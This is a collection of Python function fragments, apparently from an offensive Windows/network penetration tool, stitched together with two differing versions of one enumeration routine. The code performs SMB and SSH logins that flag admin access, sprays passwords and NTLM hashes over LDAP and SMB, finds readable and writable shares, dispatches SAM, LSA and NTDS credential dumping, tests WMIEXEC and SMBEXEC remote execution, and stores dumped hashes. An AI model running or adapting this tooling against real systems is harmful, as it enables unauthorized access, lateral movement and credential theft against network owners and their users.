def smb_login(args, loggers, host, db, lockout_obj, config_obj): status = '' smb = SmbCon(args, loggers, host, db) if smb.smb_connection(): smb.host_info() try: smb.login() if smb.admin: status = "({})".format( highlight(config_obj.PWN3D_MSG, 'yellow')) elif smb.auth and args.user: status = "({})".format(highlight('Success', 'green')) except Exception as e: e = str(e).lower() lockout_obj.failed_login(host, str(e).lower()) if "password_expired" in e: status = "({})".format(highlight('Password_Expired', 'yellow')) elif "logon_failure" in e: lockout_obj.add_attempt() status = "({})".format(highlight('Failed', 'red')) elif "account_disabled" in e: status = "({})".format(highlight('Account_Disabled', 'red')) loggers['console'].info([ smb.host, smb.ip, "ENUM", "{} {} ".format(smb.os, smb.os_arch), "(Domain: {})".format(smb.srvdomain), "(Signing: {})".format(str(smb.signing)), "(SMBv1: {})".format(str(smb.smbv1)), status ]) return smb else: raise Exception('Connection to Server Failed')
def failed_login(self, host, error): if "account_locked_out" in error: self.logger.warning([host, host, "Lockout Tracker", highlight("Account Locked: {}\{}".format(self.domain, self.username), 'red')]) _exit(1) elif "access_denied" in error: self.logger.verbose([host, host, "LOCKOUT TRACKER", highlight("Access Denied: Insufficient privileges (User: \"{}\":\"{}\")".format(self.username, self.password), 'red')]) else: self.logger.verbose([host, host, "LOCKOUT TRACKER", highlight(error, 'red')])
def run(self, target, args, smb_con, loggers): logger = loggers['console'] # Log Results self.exec_method = { WMIEXEC: { 'Name': 'WMIEXEC', 'Fileless': '\033[1;31mFAILED\033[0m', 'Remote': '\033[1;31mFAILED\033[0m' }, SMBEXEC: { 'Name': 'SMBEXEC', 'Fileless': '\033[1;31mFAILED\033[0m', 'Remote': '\033[1;31mFAILED\033[0m' } } # Defile filed/fileless via share self.exec_type = {'Remote': '', 'Fileless': gen_random_string()} # Verify Admin if not smb_con.admin: logger.warning( "{} Error: This module can only be run on a system with admin permissions" .format(self.name)) return # Start smbserver smb_srv_obj = SMBServer(loggers['console'], self.exec_type['Fileless'], verbose=args.debug) smb_srv_obj.start() # Test execution method using threading for timeouts try: for exec_method in self.exec_method: for exec_type in self.exec_type: t = Thread(target=self.test_execution, args=(args, smb_con, target, exec_method, exec_type, logger)) t.start() t.join(args.timeout + 3) except Exception as e: logger.debug("{} Error: {}".format(self.name, str(e))) # Print Results for xmethod, data in self.exec_method.items(): logger.info([ smb_con.host, smb_con.ip, highlight(self.name.upper()), ' \033[1;30mExecution Method:\033[0m {:<10} \033[1;30mFileless: {:<20} \033[1;30mRemote (Defualt): {}' .format(data['Name'], data['Fileless'], data['Remote']) ]) # Shutdown SMBServer and Exit smb_srv_obj.cleanup_server() smb_srv_obj.server = None return
def share_finder(con, args, loggers, target): valid_shares = [] target_shares = {} try: target_shares = share_perms(con) for share, data in target_shares.items(): if data['read'] == 'READ' or data['write'] == 'WRITE': loggers['console'].info([ con.host, con.ip, "SHAREFINDER", "\\\\{}\\{}".format(con.host, share), highlight("{:<5}{:<10}".format(data['read'], data['write'])), data['description'] ]) else: loggers['console'].info([ con.host, con.ip, "SHAREFINDER", "\\\\{}\\{}".format(con.host, share), highlight("{:<5}{:<10}".format(data['read'], data['write'])), data['description'] ]) #Log all shares to enum.csv loggers[args.mode].info( "ShareFinder\t{}\t{}\t\\\\{}\\{}\t{}\t{}".format( target, args.user, target, share, data['read'], data['write'], data['description'])) if data['read'] == 'READ': valid_shares.append(str(share)) except Exception as e: loggers['console'].debug( ["\\\\{}".format(target), target_shares, str(e)]) return valid_shares
def ssh_login(args, loggers, host, db, lockout_obj, config_obj): status = '' ssh = SSH(args, loggers, host, db) if ssh.ssh_connection(): ssh.host_info() try: ssh.login() if ssh.admin: status = "({})".format( highlight(config_obj.PWN3D_MSG, 'yellow')) elif ssh.auth and args.user: status = "({})".format(highlight('Success', 'green')) except Exception as e: e = str(e).lower() if "authentication failed." in e and args.user: status = "({})".format(highlight('Failed', 'red')) elif "bad authentication type" in e and args.user: status = "({})".format(highlight('Bad_Auth_Type', 'red')) loggers['console'].info( [ssh.host, ssh.ip, "ENUM", ssh.version, status]) return ssh else: raise Exception('Connection to Server Failed')
def run(self, target, args, smb_con, loggers, config_obj): """ Each module is executed from self.run, and passed the following arguments: target - Current target in enumration process args - Command line args smb_con - Active SMB Connection loggers - Dictionary of queues used to output data loggers['console'] - Write data to terminal loggers['enum] - Write data to log file enum.csv Once Complete, Add the module to the _Modules dictionary in ar3.modules.__init__.py """ loggers['console'].success([ smb_con.host, smb_con.ip, highlight(self.name.upper()), "Example Module Output: {}".format(self.args['ARGUMENTS']['Value']) ])
def spray(auth_args, loggers, db_obj, config_obj, target, user, passwd): try: if auth_args.method.lower() == "ldap": con = LdapCon(auth_args, loggers, target, db_obj) con.create_ldap_con() elif auth_args.method.lower() == 'smb': con = SmbCon(auth_args, loggers, target, db_obj) con.create_smb_con() if auth_args.hash: passwd = auth_args.hash if hasattr(con, 'admin')and con.admin == True: loggers['console'].success([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight(config_obj.PWN3D_MSG, 'yellow'))]) else: loggers['console'].success([con.host, con.ip, auth_args.method.upper(),'{}\\{:<20} {:<15} {}'.format(con.domain, user, passwd, highlight("SUCCESS", "green"))]) loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tSuccess".format(get_timestamp(), target, auth_args.domain, user, passwd)) con.close() except KeyboardInterrupt: print("\n[!] Key Event Detected, Closing...") try: con.close() except: pass _exit(0) except Exception as e: # Overwrite pwd value for output if auth_args.hash: passwd = auth_args.hash if "password has expired" in str(e).lower(): loggers['console'].success2([con.host, con.ip, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("PASSWORD EXPIRED", color='yellow'))]) loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tPassword Expired".format(get_timestamp(), target, auth_args.domain, user, passwd)) elif "account_locked_out" in str(e).lower(): loggers['console'].warning([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("ACCOUNT LOCKED", color='red'))]) loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tAccount Locked".format(get_timestamp(), target, auth_args.domain, user, passwd)) elif str(e) == "Connection to Server Failed": loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("CONNECTION ERROR", color='red'))]) loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tConnection Error".format(get_timestamp(), target, auth_args.domain, user, passwd)) elif "status_logon_failure" in str(e).lower() or "invalidCredentials" in str(e).lower(): loggers['console'].verbose([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight("FAILED", color='red'))]) loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\tLogin Failed".format(get_timestamp(), target, auth_args.domain, user, passwd)) else: loggers['console'].debug([target, target, auth_args.method.upper(), '{}\\{:<20} {:<15} {}'.format(auth_args.domain, user, passwd, highlight(str(e), color='red'))]) loggers[auth_args.mode].info("[{}]\tSpray\t{}\t{}\\{}\t{}\t{}".format(get_timestamp(), target, auth_args.domain, user, passwd, str(e))) sleep(auth_args.jitter) del auth_args
def host_enum(target, args, lockout, config_obj, db_obj, loggers): try: # OS Enumeration try: con = login(args, loggers, target, db_obj, lockout) if con.admin: loggers['console'].success([con.host, con.ip, "ENUM", con.os + con.os_arch, "(Domain: {})".format(con.srvdomain), "(Signing: {})".format(str(con.signing)), "(SMBv1: {})".format(str(con.smbv1)), "({})".format(highlight(config_obj.PWN3D_MSG, 'yellow'))]) else: loggers['console'].info([con.host, con.ip, "ENUM", con.os + con.os_arch, "(Domain: {})".format(con.srvdomain),"(Signing: {})".format(str(con.signing)), "(SMBv1: {})".format(str(con.smbv1))]) except Exception as e: return [] # Sharefinder shares = [] if args.share: shares = args.share.split(",") for share in shares: loggers['console'].info([con.host, con.ip, "USER_SHARES", "\\\\{}\\{}".format(con.host, share)]) elif args.sharefinder or args.spider: shares = share_finder(con, args, loggers, target) # Secondary actions if args.gen_relay_list and not con.signing: loggers['relay_list'].info(con.host) if args.passpol: password_policy(con, args, db_obj, loggers) if args.sam: extract_sam(con, args, target, loggers) if args.ntds: extract_ntds(con, args, target, loggers) if args.loggedon: loggedon_users(con, args, target, loggers) if args.sessions: active_sessions(con, args, target, loggers) if args.list_processes: tasklist(con, args, loggers) if args.wmi_query: wmi_query(con, args, target, loggers) if args.execute: code_execution(con, args, target, loggers, config_obj) if args.ps_execute: ps_execution(con, args, target, loggers, config_obj) if args.module: execute_module(con, args, target, loggers, config_obj) # Close connections & return try: con.con.logoff() except: pass con.close() loggers['console'].debug("Shares returned for: {} {}".format(target, shares)) return shares except KeyboardInterrupt: try: con.close() except: pass _exit(0) except Exception as e: loggers['console'].debug(str(e))
def host_enum(target, args, lockout, config_obj, db_obj, loggers): # @TODO refactor try: try: if args.exec_method == 'ssh': con = ssh_login(args, loggers, target, db_obj, lockout, config_obj) else: con = smb_login(args, loggers, target, db_obj, lockout, config_obj) except Exception as e: loggers['console'].debug( [target, target, "ENUM", highlight(str(e), 'red')]) return [] shares = [] if args.exec_method == 'ssh' and con.auth: if args.execute: con.admin = True # Override admin to allow execution code_execution(con, args, target, loggers, config_obj, args.execute) return [] elif con.auth: # Sharefinder if args.share: shares = args.share.split(",") for share in shares: loggers['console'].info([ con.host, con.ip, "SHAREFINDER", "\\\\{}\\{}".format(con.host, share) ]) elif args.sharefinder or args.spider: shares = share_finder(con, args, loggers, target) # Secondary actions if args.passpol: password_policy(con, args, db_obj, loggers) if args.sam: extract_sam(con, args, target, loggers) if args.lsa: extract_lsa(con, args, target, loggers) if args.ntds: extract_ntds(con, args, target, loggers) if args.loggedon: loggedon_users(con, args, target, loggers) if args.sessions: active_sessions(con, args, target, loggers) if args.list_processes: tasklist(con, args, loggers) if args.list_services: list_services(con, args, loggers, target) if args.local_groups: get_netlocalgroups(con, args, target, loggers) if args.local_members: localgroup_members(con, args, target, loggers) if args.wmi_query: wmi_query(con, args, target, loggers) if args.execute: code_execution(con, args, target, loggers, config_obj, args.execute) if args.ps_execute: ps_execution(con, args, target, loggers, config_obj) if args.module: execute_module(con, args, target, loggers, config_obj) # Close connections & return try: con.con.logoff() except: pass con.close() loggers['console'].debug("Shares returned for: {} {}".format( target, shares)) return shares except KeyboardInterrupt: try: con.close() except: pass _exit(0) except Exception as e: loggers['console'].debug(str(e))
def add_sam_hash(sam_hash, host_id): self.logger.success( [self.host, highlight("SAM HASH"), sam_hash]) username, _, lmhash, nthash, _, _, _ = sam_hash.split(':') self.db.update_user(username, '', host_id, "{}:{}".format(lmhash, nthash))